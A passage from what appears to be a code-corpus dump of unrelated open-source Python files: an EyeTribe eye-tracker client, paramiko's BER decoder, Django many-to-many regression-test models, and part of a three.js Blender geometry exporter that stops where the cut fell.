elif values == None:
pass
# error if the values are anything other than a dict, tuple or list
else:
raise Exception("values should be dict, tuple or list, not '%s' (values = %s)" % (type(values),values))
# create the json message
if request == None:
jsonmsg = '''
{
"category": "%s"
}''' % (category)
elif values == None:
jsonmsg = '''
{
"category": "%s",
"request": "%s",
}''' % (category, request)
else:
jsonmsg = '''
{
"category": "%s",
"request": "%s",
"values": %s
}''' % (category, request, valuestring)
return jsonmsg
def parse_json(self, jsonmsg):
"""Parses a json message as those that are usually returned by the
EyeTribe tracker
(for more info, see: http://dev.theeyetribe.com/api/)
arguments
jsonmsg -- a string in json format
keyword arguments
None
returns
msg -- a dict containing the information in the json message;
this dict has the following content:
{ "category": "tracker",
"request": "get",
"statuscode": 200,
"values": { "push":True,
"iscalibrated":True
}
}
"""
# parse json message
parsed = json.loads(jsonmsg)
return parsed
def revive(self):
"""Re-establishes a connection
"""
# close old connection
self.close()
# initialize a connection
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host,self.port))
def close(self):
"""Closes the connection to the EyeTribe tracker
"""
# close the socket connection
self.sock.close()
class tracker:
"""class for SDK Tracker state and information related requests"""
def __init__(self, connection):
"""Initializes a tracker instance
arguments
connection -- a pytribe.connection instance for the currently
attached EyeTribe tracker
"""
self.connection = connection
self.push = True
def set_connection(self, connection):
"""Set a new connection
arguments
connection -- a pytribe.connection instance for the currently
attached EyeTribe tracker
"""
self.connection = connection
def get_push(self):
"""Returns a Booleam reflecting the state: True for push mode,
False for pull mode (Boolean)
"""
# send the request
response = self.connection.request('tracker', 'get', ['push'])
# return value or error
if response['statuscode'] == 200:
return response['values']['push'] == 'true'
else:
raise Exception("Error in tracker.get_push: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_heartbeatinterval(self):
"""Returns the expected heartbeat interval in milliseconds
(integer)
"""
# send the request
response = self.connection.request('tracker', 'get', ['heartbeatinterval'])
# check if the tracker is in push mode
if response['statuscode'] == 200:
return response['values']['heartbeatinterval']
else:
raise Exception("Error in tracker.get_heartbeatinterval: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_version(self):
"""Returns the version number (integer)
"""
# send the request
response = self.connection.request('tracker', 'get', ['version'])
# return value or error
if response['statuscode'] == 200:
return response['values']['version']
else:
raise Exception("Error in tracker.get_version: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_trackerstate(self):
"""Returns the state of the physcial tracker (integer):
0: TRACKER_CONNECTED
tracker is detected and working
1: TRACKER_NOT_CONNECTED
tracker device is not connected
2: TRACKER_CONNECTED_BADFW
tracker device is connected, but not working due to
bad firmware
3: TRACKER_CONNECTED_NOUSB3
tracker device is connected, but not working due to
unsupported USB host
4: TRACKER_CONNECTED_NOSTREAM
tracker device is connected, but no stream could be
received
"""
# send the request
response = self.connection.request('tracker', 'get', ['trackerstate'])
# return value of error
if response['statuscode'] == 200:
return response['values']['trackerstate']
else:
raise Exception("Error in tracker.get_trackerstate: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_framerate(self):
"""Returns the frame rate that the tracker is running at (integer)
"""
# send the request
response = self.connection.request('tracker', 'get', ['framerate'])
# return value or error
if response['statuscode'] == 200:
return response['values']['framerate']
else:
raise Exception("Error in tracker.get_framerate: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_iscalibrated(self):
"""Indicates whether there is a calibration (Boolean)
"""
# send the request
response = self.connection.request('tracker', 'get', ['iscalibrated'])
# return value or error
if response['statuscode'] == 200:
return response['values']['iscalibrated'] == 'true'
else:
raise Exception("Error in tracker.get_iscalibrated: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_iscalibrating(self):
"""Indicates whether the tracker is in calibration mode (Boolean)
"""
# send the request
response = self.connection.request('tracker', 'get', ['iscalibrating'])
# return value or error
if response['statuscode'] == 200:
return response['values']['iscalibrating'] == 'true'
else:
raise Exception("Error in tracker.get_iscalibrating: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_calibresult(self):
"""Gets the latest valid calibration result
returns
WITHOUT CALIBRATION:
None
WITH CALIBRATION:
calibresults -- a dict containing the calibration results:
{ 'result': Boolean indicating whether the
calibration was succesful
'deg': float indicating the average error
in degrees of visual angle
'Ldeg': float indicating the left eye
error in degrees of visual angle
'Rdeg': float indicating the right eye
error in degrees of visual angle
'calibpoints': list, containing a dict for
each calibration point:
{'state': integer indicating
the state of the
calibration point
(0 means no useful
data has been
obtained and the
point should be
resampled; 1 means
the data is of
questionable
quality, consider
resampling; 2 means
the data is ok)
'cpx': x coordinate of the
calibration point
'cpy': y coordinate of the
calibration point
'mecpx': mean estimated x
coordinate of the
calibration point
'mecpy': mean estimated y
coordinate of the
calibration point
'acd': float indicating
the accuracy in
degrees of visual
angle
'Lacd': float indicating
the accuracy in
degrees of visual
angle (left eye)
'Racd': float indicating
the accuracy in
degrees of visual
angle (right eye)
'mepix': mean error in
pixels
'Lmepix': mean error in
pixels (left eye)
'Rmepix': mean error in
pixels (right eye)
'asdp': standard deviation
in pixels
'Lasdp': standard deviation
in pixels (left eye)
'Rasdp': standard deviation
in pixels (right eye)
}
}
"""
# send the request
response = self.connection.request('tracker', 'get', ['calibresult'])
# return value or error
if response['statuscode'] != 200:
raise Exception("Error in tracker.get_calibresult: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
# return True if this was not the final calibration point
if not 'calibpoints' in response['values']:
return None
# if this was the final calibration point, return the results
else:
# return calibration dict
returndict = { 'result':response['values']['calibresult']['result'],
'deg':response['values']['calibresult']['deg'],
'Rdeg':response['values']['calibresult']['degl'],
'Ldeg':response['values']['calibresult']['degr'],
'calibpoints':[]
}
for pointdict in response['values']['calibresult']['calibpoints']:
returndict['calibpoints'].append({ 'state':pointdict['state'],
'cpx':pointdict['cp']['x'],
'cpy':pointdict['cp']['y'],
'mecpx':pointdict['mecp']['x'],
'mecpy':pointdict['mecp']['y'],
'acd':pointdict['acd']['ad'],
'Lacd':pointdict['acd']['adl'],
'Racd':pointdict['acd']['adr'],
'mepix':pointdict['mepix']['mep'],
'Lmepix':pointdict['mepix']['mepl'],
'Rmepix':pointdict['mepix']['mepr'],
'asdp':pointdict['asdp']['asd'],
'Lasdp':pointdict['asdp']['asdl'],
'Rasdp':pointdict['asdp']['asdr']
})
return returndict
def get_frame(self):
"""Returns the latest frame data (dict)
{ 'timestamp': string time representation,
'time': integer timestamp in milliseconds,
'fix': Boolean indicating whether there is a fixation,
'state': integer 32bit masked tracker state,
'rawx': integer raw x gaze coordinate in pixels,
'rawy': integer raw y gaze coordinate in pixels,
'avgx': integer smoothed x gaze coordinate in pixels,
'avgx': integer smoothed y gaze coordinate in pixels,
'psize': float average pupil size,
'Lrawx': integer raw x left eye gaze coordinate in pixels,
'Lrawy': integer raw y left eye gaze coordinate in pixels,
'Lavgx': integer smoothed x left eye gaze coordinate in pixels,
'Lavgx': integer smoothed y left eye gaze coordinate in pixels,
'Lpsize': float left eye pupil size,
'Lpupilx': integer raw left eye pupil centre x coordinate,
'Lpupily': integer raw left eye pupil centre y coordinate,
'Rrawx': integer raw x right eye gaze coordinate in pixels,
'Rrawy': integer raw y right eye gaze coordinate in pixels,
'Ravgx': integer smoothed x right eye gaze coordinate in pixels,
'Ravgx': integer smoothed y right eye gaze coordinate in pixels,
'Rpsize': float right eye pupil size,
'Rpupilx': integer raw right eye pupil centre x coordinate,
'Rpupily': integer raw right eye pupil centre y coordinate
}
"""
# send the request
response = self.connection.request('tracker', 'get', ['frame'])
# raise error if needed
if response['statuscode'] != 200:
raise Exception("Error in tracker.get_frame: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
# parse response
return { 'timestamp': response['values']['frame']['timestamp'],
'time': response['values']['frame']['time'],
'fix': response['values']['frame']['fix']=='true',
'state': response['values']['frame']['state'],
'rawx': response['values']['frame']['raw']['x'],
'rawy': response['values']['frame']['raw']['y'],
'avgx': response['values']['frame']['avg']['x'],
'avgy': response['values']['frame']['avg']['y'],
'psize': (response['values']['frame']['lefteye']['psize']+response['values']['frame']['righteye']['psize'])/2.0,
'Lrawx': response['values']['frame']['lefteye']['raw']['x'],
'Lrawy': response['values']['frame']['lefteye']['raw']['y'],
'Lavgx': response['values']['frame']['lefteye']['avg']['x'],
'Lavgy': response['values']['frame']['lefteye']['avg']['y'],
'Lpsize': response['values']['frame']['lefteye']['psize'],
'Lpupilx': response['values']['frame']['lefteye']['pcenter']['x'],
'Lpupily': response['values']['frame']['lefteye']['pcenter']['y'],
'Rrawx': response['values']['frame']['righteye']['raw']['x'],
'Rrawy': response['values']['frame']['righteye']['raw']['y'],
'Ravgx': response['values']['frame']['righteye']['avg']['x'],
'Ravgy': response['values']['frame']['righteye']['avg']['y'],
'Rpsize': response['values']['frame']['righteye']['psize'],
'Rpupilx': response['values']['frame']['righteye']['pcenter']['x'],
'Rpupily': response['values']['frame']['righteye']['pcenter']['y']
}
def get_screenindex(self):
"""Returns the screen index number in a multi screen setup (integer)
"""
# send the request
response = self.connection.request('tracker', 'get', ['screenindex'])
# return value or error
if response['statuscode'] == 200:
return response['values']['screenindex']
else:
raise Exception("Error in tracker.get_screenindex: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_screenresw(self):
"""Returns the screen resolution width in pixels (integer)
"""
# send the request
response = self.connection.request('tracker', 'get', ['screenresw'])
# return value or error
if response['statuscode'] == 200:
return response['values']['screenresw']
else:
raise Exception("Error in tracker.get_screenresw: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_screenresh(self):
"""Returns the screen resolution height in pixels (integer)
"""
# send the request
response = self.connection.request('tracker', 'get', ['screenresh'])
# return value or error
if response['statuscode'] == 200:
return response['values']['screenresh']
else:
raise Exception("Error in tracker.get_screenresh: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_screenpsyw(self):
"""Returns the physical screen width in meters (float)
"""
# send the request
response = self.connection.request('tracker', 'get', ['screenpsyw'])
# return value or error
if response['statuscode'] == 200:
return response['values']['screenpsyw']
else:
raise Exception("Error in tracker.get_screenpsyw: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def get_screenpsyh(self):
"""Returns the physical screen height in meters (float)
"""
# send the request
response = self.connection.request('tracker', 'get', ['screenpsyh'])
# return value or error
if response['statuscode'] == 200:
return response['values']['screenpsyh']
else:
raise Exception("Error in tracker.get_screenpsyh: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def set_push(self, push=None):
"""Toggles the push state, or sets the state to the passed value
keyword arguments
push -- Boolean indicating the state: True for push,
False for pull
None to toggle current
returns
state -- Boolean indicating the push state
"""
# check passed value
if push == None:
# toggle state
self.push = self.push != True
elif type(push) == bool:
# set state to passed value
self.push = push
else:
# error on anything other than None, True or False
raise Exception("tracker.set_push: push keyword argument should be a Boolean or None, not '%s'" % push)
# send the request
response = self.connection.request('tracker', 'set', {'push':str(self.push).lower()})
# return value or error
if response['statuscode'] == 200:
return self.push
else:
raise Exception("Error in tracker.set_push: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def set_version(self, version):
"""Set the protocol version
arguments
version -- integer version number
"""
# send the request
response = self.connection.request('tracker', 'set', {'version':version})
# return value or error
if response['statuscode'] == 200:
return version
else:
raise Exception("Error in tracker.set_version: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def set_screenindex(self, index):
"""Set the screen index
arguments
index -- integer value indicating the index number of the
screen that is to be used with the tracker
"""
# send the request
response = self.connection.request('tracker', 'set', {'screenindex':index})
# return value or error
if response['statuscode'] == 200:
return index
else:
raise Exception("Error in tracker.set_screenindex: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def set_screenresw(self, width):
"""Set the screen resolution width
arguments
width -- integer value indicating the screen resolution width
in pixels
"""
# send the request
response = self.connection.request('tracker', 'set', {'screenresw':width})
# return value or error
if response['statuscode'] == 200:
return width
else:
raise Exception("Error in tracker.set_screenresw: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def set_screenresh(self, height):
"""Set the screen resolution height
arguments
height -- integer value indicating the screen resolution height
in pixels
"""
# send the request
response = self.connection.request('tracker', 'set', {'screenresh':height})
# return value or error
if response['statuscode'] == 200:
return height
else:
raise Exception("Error in tracker.set_screenresh: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def set_screenpsyw(self, width):
"""Set the physical width of the screen
arguments
width -- float value indicating the physical screen width in
metres
"""
# send the request
response = self.connection.request('tracker', 'set', {'screenpsyw':width})
# return value or error
if response['statuscode'] == 200:
return width
else:
raise Exception("Error in tracker.set_screenpsyw: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def set_screenpsyh(self, height):
"""Set the physical height of the screen
arguments
width -- float value indicating the physical screen height in
metres
"""
# send the request
response = self.connection.request('tracker', 'set', {'screenpsyh':height})
# return value or error
if response['statuscode'] == 200:
return height
else:
raise Exception("Error in tracker.set_screenpsyh: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
class calibration:
"""class for calibration related requests"""
def __init__(self, connection):
"""Initializes a calibration instance
arguments
connection -- a pytribe.connection instance for the currently
attached EyeTribe tracker
"""
self.connection = connection
def set_connection(self, connection):
"""Set a new connection
arguments
connection -- a pytribe.connection instance for the currently
attached EyeTribe tracker
"""
self.connection = connection
def start(self, pointcount=9):
"""Starts the calibration, using the passed number of calibration
points
keyword arguments
pointcount -- integer value indicating the amount of
calibration points that should be used, which
should be at least 7 (default = 9)
"""
# send the request
response = self.connection.request('calibration', 'start', {'pointcount':pointcount})
# return value or error
if response['statuscode'] == 200:
return True
else:
raise Exception("Error in calibration.start: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def pointstart(self, x, y):
"""Mark the beginning of a new calibration point for the tracker to
process
arguments
x -- integer indicating the x coordinate of the
calibration point
y -- integer indicating the y coordinate of the
calibration point
returns
success -- Boolean: True on success, False on a failure
"""
# send the request
response = self.connection.request('calibration', 'pointstart', {'x':x,'y':y})
# return value or error
if response['statuscode'] == 200:
return True
else:
raise Exception("Error in calibration.pointstart: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def pointend(self):
"""Mark the end of processing a calibration point
returns
NORMALLY:
success -- Boolean: True on success, False on failure
AFTER FINAL POINT:
calibresults -- a dict containing the calibration results:
{ 'result': Boolean indicating whether the
calibration was succesful
'deg': float indicating the average error
in degrees of visual angle
'Ldeg': float indicating the left eye
error in degrees of visual angle
'Rdeg': float indicating the right eye
error in degrees of visual angle
'calibpoints': list, containing a dict for
each calibration point:
{'state': integer indicating
the state of the
calibration point
(0 means no useful
data has been
obtained and the
point should be
resampled; 1 means
the data is of
questionable
quality, consider
resampling; 2 means
the data is ok)
'cpx': x coordinate of the
calibration point
'cpy': y coordinate of the
calibration point
'mecpx': mean estimated x
coordinate of the
calibration point
'mecpy': mean estimated y
coordinate of the
calibration point
'acd': float indicating
the accuracy in
degrees of visual
angle
'Lacd': float indicating
the accuracy in
degrees of visual
angle (left eye)
'Racd': float indicating
the accuracy in
degrees of visual
angle (right eye)
'mepix': mean error in
pixels
'Lmepix': mean error in
pixels (left eye)
'Rmepix': mean error in
pixels (right eye)
'asdp': standard deviation
in pixels
'Lasdp': standard deviation
in pixels (left eye)
'Rasdp': standard deviation
in pixels (right eye)
}
}
"""
# send the request
response = self.connection.request('calibration', 'pointend', None)
# return value or error
if response['statuscode'] != 200:
raise Exception("Error in calibration.pointend: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
# return True if this was not the final calibration point
if not 'calibresult' in response['values']:
return True
# if this was the final calibration point, return the results
else:
# return calibration dict
returndict = { 'result':response['values']['calibresult']['result'],
'deg':response['values']['calibresult']['deg'],
'Rdeg':response['values']['calibresult']['degl'],
'Ldeg':response['values']['calibresult']['degr'],
'calibpoints':[]
}
for pointdict in response['values']['calibresult']['calibpoints']:
returndict['calibpoints'].append({ 'state':pointdict['state'],
'cpx':pointdict['cp']['x'],
'cpy':pointdict['cp']['y'],
'mecpx':pointdict['mecp']['x'],
'mecpy':pointdict['mecp']['y'],
'acd':pointdict['acd']['ad'],
'Lacd':pointdict['acd']['adl'],
'Racd':pointdict['acd']['adr'],
'mepix':pointdict['mepix']['mep'],
'Lmepix':pointdict['mepix']['mepl'],
'Rmepix':pointdict['mepix']['mepr'],
'asdp':pointdict['asdp']['asd'],
'Lasdp':pointdict['asdp']['asdl'],
'Rasdp':pointdict['asdp']['asdr']
})
return returndict
def abort(self):
"""Cancels the ongoing sequence and reinstates the previous
calibration (only if there is one!)
returns
success -- Boolean: True on success, False on failure
"""
# send the request
response = self.connection.request('calibration', 'abort', None)
# return value or error
if response['statuscode'] == 200:
return True
else:
raise Exception("Error in calibration.abort: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
def clear(self):
"""Removes the current calibration from the tracker
returns
success -- Boolean: True on success, False on failure
"""
# send the request
response = self.connection.request('calibration', 'clear', None)
# return value or error
if response['statuscode'] == 200:
return True
else:
raise Exception("Error in calibration.clear: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
class heartbeat:
"""class for signalling heartbeats to the server"""
def __init__(self, connection):
"""Initializes a heartbeat instance (not implemented in the SDK yet)
arguments
connection -- a pytribe.connection instance for the currently
attached EyeTribe tracker
"""
self.connection = connection
def set_connection(self, connection):
"""Set a new connection
arguments
connection -- a pytribe.connection instance for the currently
attached EyeTribe tracker
"""
self.connection = connection
def beat(self):
"""Sends a heartbeat to the device
"""
# send the request
response = self.connection.request('heartbeat', None, None)
# return value or error
if response['statuscode'] == 200:
return True
else:
raise Exception("Error in heartbeat.beat: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
# # # # #
# DEBUG #
if __name__ == "__main__":
test = EyeTribe()
test.start_recording()
time.sleep(10)
test.stop_recording()
test.close()
# # # # # |
selboo/paramiko | refs/heads/master | paramiko/ber.py | 11 | # Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
from paramiko.common import max_byte, zero_byte
from paramiko.py3compat import b, byte_ord, byte_chr, long
import paramiko.util as util
class BERException (Exception):
pass
class BER(object):
"""
Robey's tiny little attempt at a BER decoder.
"""
def __init__(self, content=bytes()):
self.content = b(content)
self.idx = 0
def asbytes(self):
return self.content
def __str__(self):
return self.asbytes()
def __repr__(self):
return 'BER(\'' + repr(self.content) + '\')'
def decode(self):
return self.decode_next()
def decode_next(self):
if self.idx >= len(self.content):
return None
ident = byte_ord(self.content[self.idx])
self.idx += 1
if (ident & 31) == 31:
# identifier > 30
ident = 0
while self.idx < len(self.content):
t = byte_ord(self.content[self.idx])
self.idx += 1
ident = (ident << 7) | (t & 0x7f)
if not (t & 0x80):
break
if self.idx >= len(self.content):
return None
# now fetch length
size = byte_ord(self.content[self.idx])
self.idx += 1
if size & 0x80:
# more complimicated...
# FIXME: theoretically should handle indefinite-length (0x80)
t = size & 0x7f
if self.idx + t > len(self.content):
return None
size = util.inflate_long(self.content[self.idx: self.idx + t], True)
self.idx += t
if self.idx + size > len(self.content):
# can't fit
return None
data = self.content[self.idx: self.idx + size]
self.idx += size
# now switch on id
if ident == 0x30:
# sequence
return self.decode_sequence(data)
elif ident == 2:
# int
return util.inflate_long(data)
else:
# 1: boolean (00 false, otherwise true)
raise BERException('Unknown ber encoding type %d (robey is lazy)' % ident)
def decode_sequence(data):
out = []
ber = BER(data)
while True:
x = ber.decode_next()
if x is None:
break
out.append(x)
return out
decode_sequence = staticmethod(decode_sequence)
def encode_tlv(self, ident, val):
# no need to support ident > 31 here
self.content += byte_chr(ident)
if len(val) > 0x7f:
lenstr = util.deflate_long(len(val))
self.content += byte_chr(0x80 + len(lenstr)) + lenstr
else:
self.content += byte_chr(len(val))
self.content += val
def encode(self, x):
if type(x) is bool:
if x:
self.encode_tlv(1, max_byte)
else:
self.encode_tlv(1, zero_byte)
elif (type(x) is int) or (type(x) is long):
self.encode_tlv(2, util.deflate_long(x))
elif type(x) is str:
self.encode_tlv(4, x)
elif (type(x) is list) or (type(x) is tuple):
self.encode_tlv(0x30, self.encode_sequence(x))
else:
raise BERException('Unknown type for encoding: %s' % repr(type(x)))
def encode_sequence(data):
ber = BER()
for item in data:
ber.encode(item)
return ber.asbytes()
encode_sequence = staticmethod(encode_sequence)
|
ccnmtl/lettuce | refs/heads/master | tests/integration/lib/Django-1.3/tests/regressiontests/m2m_regress/models.py | 92 | from django.db import models
from django.contrib.auth import models as auth
# No related name is needed here, since symmetrical relations are not
# explicitly reversible.
class SelfRefer(models.Model):
name = models.CharField(max_length=10)
references = models.ManyToManyField('self')
related = models.ManyToManyField('self')
def __unicode__(self):
return self.name
class Tag(models.Model):
name = models.CharField(max_length=10)
def __unicode__(self):
return self.name
# Regression for #11956 -- a many to many to the base class
class TagCollection(Tag):
tags = models.ManyToManyField(Tag, related_name='tag_collections')
def __unicode__(self):
return self.name
# A related_name is required on one of the ManyToManyField entries here because
# they are both addressable as reverse relations from Tag.
class Entry(models.Model):
name = models.CharField(max_length=10)
topics = models.ManyToManyField(Tag)
related = models.ManyToManyField(Tag, related_name="similar")
def __unicode__(self):
return self.name
# Two models both inheriting from a base model with a self-referential m2m field
class SelfReferChild(SelfRefer):
pass
class SelfReferChildSibling(SelfRefer):
pass
# Many-to-Many relation between models, where one of the PK's isn't an Autofield
class Line(models.Model):
name = models.CharField(max_length=100)
class Worksheet(models.Model):
id = models.CharField(primary_key=True, max_length=100)
lines = models.ManyToManyField(Line, blank=True, null=True)
# Regression for #11226 -- A model with the same name that another one to
# which it has a m2m relation. This shouldn't cause a name clash between
# the automatically created m2m intermediary table FK field names when
# running syncdb
class User(models.Model):
name = models.CharField(max_length=30)
friends = models.ManyToManyField(auth.User)
|
freekh/three.js | refs/heads/master | utils/exporters/blender/addons/io_three/exporter/geometry.py | 124 | """
Module for creating Three.js geometry JSON nodes.
"""
import os
from .. import constants, logger
from . import base_classes, io, api
FORMAT_VERSION = 3
class Geometry(base_classes.BaseNode):
"""Class that wraps a single mesh/geometry node."""
def __init__(self, node, parent=None):
logger.debug("Geometry().__init__(%s)", node)
#@TODO: maybe better to have `three` constants for
# strings that are specific to `three` properties
geo_type = constants.GEOMETRY.title()
if parent.options.get(constants.GEOMETRY_TYPE):
opt_type = parent.options[constants.GEOMETRY_TYPE]
if opt_type == constants.BUFFER_GEOMETRY:
geo_type = constants.BUFFER_GEOMETRY
elif opt_type != constants.GEOMETRY:
logger.error("Unknown geometry type %s", opt_type)
logger.info("Setting %s to '%s'", node, geo_type)
self._defaults[constants.TYPE] = geo_type
base_classes.BaseNode.__init__(self, node,
parent=parent,
type=geo_type)
@property
def animation_filename(self):
"""Calculate the file name for the animation file
:return: base name for the file
"""
compression = self.options.get(constants.COMPRESSION)
if compression in (None, constants.NONE):
ext = constants.JSON
elif compression == constants.MSGPACK:
ext = constants.PACK
key = ''
for key in (constants.MORPH_TARGETS, constants.ANIMATION):
if key in self.keys():
break
else:
logger.info("%s has no animation data", self.node)
return
return '%s.%s.%s' % (self.node, key, ext)
@property
def face_count(self):
"""Parse the bit masks of the `faces` array.
:rtype: int
"""
try:
faces = self[constants.FACES]
except KeyError:
logger.debug("No parsed faces found")
return 0
length = len(faces)
offset = 0
bitset = lambda x, y: x & (1 << y)
face_count = 0
masks = (constants.MASK[constants.UVS],
constants.MASK[constants.NORMALS],
constants.MASK[constants.COLORS])
while offset < length:
bit = faces[offset]
offset += 1
face_count += 1
is_quad = bitset(bit, constants.MASK[constants.QUAD])
vector = 4 if is_quad else 3
offset += vector
if bitset(bit, constants.MASK[constants.MATERIALS]):
offset += 1
for mask in masks:
if bitset(bit, mask):
offset += vector
return face_count
@property
def metadata(self):
"""Metadata for the current node.
:rtype: dict
"""
metadata = {
constants.GENERATOR: constants.THREE,
constants.VERSION: FORMAT_VERSION
}
if self[constants.TYPE] == constants.GEOMETRY.title():
self._geometry_metadata(metadata)
else:
self._buffer_geometry_metadata(metadata)
return metadata
def copy(self, scene=True):
"""Copy the geometry definitions to a standard dictionary.
:param scene: toggle for scene formatting
(Default value = True)
:type scene: bool
:rtype: dict
"""
logger.debug("Geometry().copy(scene=%s)", scene)
dispatch = {
True: self._scene_format,
False: self._geometry_format
}
data = dispatch[scene]()
try:
data[constants.MATERIALS] = self[constants.MATERIALS].copy()
except KeyError:
logger.debug("No materials to copy")
return data
def copy_textures(self, texture_folder=''):
"""Copy the textures to the destination directory."""
logger.debug("Geometry().copy_textures()")
if self.options.get(constants.COPY_TEXTURES):
texture_registration = self.register_textures()
if texture_registration:
logger.info("%s has registered textures", self.node)
dirname = os.path.dirname(self.scene.filepath)
full_path = os.path.join(dirname, texture_folder)
io.copy_registered_textures(
full_path, texture_registration)
def parse(self):
"""Parse the current node"""
logger.debug("Geometry().parse()")
if self[constants.TYPE] == constants.GEOMETRY.title():
logger.info("Parsing Geometry format")
self._parse_geometry()
else:
logger.info("Parsing BufferGeometry format")
self._parse_buffer_geometry()
def register_textures(self):
"""Obtain a texture registration object.
:rtype: dict
"""
logger.debug("Geometry().register_textures()")
return api.mesh.texture_registration(self.node)
def write(self, filepath=None):
"""Write the geometry definitions to disk. Uses the
desitnation path of the scene.
:param filepath: optional output file path
(Default value = None)
:type filepath: str
"""
logger.debug("Geometry().write(filepath=%s)", filepath)
filepath = filepath or self.scene.filepath
io.dump(filepath, self.copy(scene=False),
options=self.scene.options)
if self.options.get(constants.MAPS):
logger.info("Copying textures for %s", self.node)
self.copy_textures()
def write_animation(self, filepath):
"""Write the animation definitions to a separate file
on disk. This helps optimize the geometry file size.
:param filepath: destination path
:type filepath: str
"""
logger.debug("Geometry().write_animation(%s)", filepath)
for key in (constants.MORPH_TARGETS, constants.ANIMATION):
try:
data = self[key]
break
except KeyError:
pass
else:
logger.info("%s has no animation data", self.node)
return
filepath = os.path.join(filepath, self.animation_filename)
if filepath:
logger.info("Dumping animation data to %s", filepath)
io.dump(filepath, data, options=self.scene.options)
return filepath
else:
logger.warning("Could not determine a filepath for "\
"animation data. Nothing written to disk.")
def _component_data(self):
"""Query the component data only
:rtype: dict
"""
logger.debug("Geometry()._component_data()")
if self[constants.TYPE] != constants.GEOMETRY.title():
return self[constants.ATTRIBUTES]
components = [constants.VERTICES, constants.FACES,
constants.UVS, constants.COLORS,
constants.NORMALS, constants.BONES,
constants.SKIN_WEIGHTS,
constants.SKIN_INDICES, constants.NAME,
constants.INFLUENCES_PER_VERTEX]
data = {}
anim_components = [constants.MORPH_TARGETS, constants.ANIMATION]
if self.options.get(constants.EMBED_ANIMATION):
components.extend(anim_components)
else:
for component in anim_components:
try:
self[component]
except KeyError:
pass
else:
data[component] = os.path.basename(
self.animation_filename)
break
else:
logger.info("No animation data found for %s", self.node)
for component in components:
try:
data[component] = self[component]
except KeyError:
logger.debug("Component %s not found", component)
return data
def _geometry_format(self):
"""Three.Geometry formatted definitions
:rtype: dict
"""
data = self._component_data()
if self[constants.TYPE] != constants.GEOMETRY.title():
data = {constants.ATTRIBUTES: data}
data[constants.METADATA] = {
constants.TYPE: self[constants.TYPE]
}
data[constants.METADATA].update(self.metadata)
return data
def _buffer_geometry_metadata(self, metadata):
"""Three.BufferGeometry metadata
:rtype: dict
"""
for key, value in self[constants.ATTRIBUTES].items():
size = value[constants.ITEM_SIZE]
array = value[constants.ARRAY]
metadata[key] = len(array)/size
def _geometry_metadata(self, metadata):
"""Three.Geometry metadat
:rtype: dict
"""
skip = (constants.TYPE, constants.FACES, constants.UUID,
constants.ANIMATION, constants.SKIN_INDICES,
constants.SKIN_WEIGHTS, constants.NAME,
constants.INFLUENCES_PER_VERTEX)
vectors = (constants.VERTICES, constants.NORMALS)
for key in self.keys():
if key in vectors:
try:
metadata[key] = int(len(self[key])/3)
except KeyError:
pass
continue
if key in skip:
continue
metadata[key] = len(self[key])
faces = self.face_count
if faces > 0:
metadata[constants.FACES] = faces
def _scene_format(self):
"""Format the output for Scene compatability
:rtype: dict
"""
data = {
constants.UUID: self[constants.UUID],
constants.TYPE: self[constants.TYPE]
}
component_data = self._component_data()
if self[constants.TYPE] == constants.GEOMETRY.title():
data[constants.DATA] = component_data
data[constants.DATA].update({
constants.METADATA: self.metadata
})
else:
if self.options.get(constants.EMBED_GEOMETRY, True):
data[constants.DATA] = {
constants.ATTRIBUTES: component_data
}
else:
data[constants.ATTRIBUTES] = component_data
data[constants.METADATA] = self.metadata
data[constants.NAME] = self[constants.NAME]
return data
def _parse_buffer_geometry(self):
"""Parse the geometry to Three.BufferGeometry specs"""
self[constants.ATTRIBUTES] = {}
options_vertices = self.options.get(constants.VERTICES)
option_normals = self.options.get(constants.NORMALS)
option_uvs = self.options.get(constants.UVS)
pos_tuple = (constants.POSITION, options_vertices,
api.mesh.buffer_position, 3)
uvs_tuple = (constants.UV, option_uvs,
api.mesh.buffer_uv, 2)
normals_tuple = (constants.NORMAL, option_normals,
api.mesh.buffer_normal, 3)
dispatch = (pos_tuple, uvs_tuple, normals_tuple)
for key, option, func, size in dispatch:
if not option:
continue
array = func(self.node) or []
if not array:
logger.warning("No array could be made for %s", key)
continue
self[constants.ATTRIBUTES][key] = {
constants.ITEM_SIZE: size,
constants.TYPE: constants.FLOAT_32,
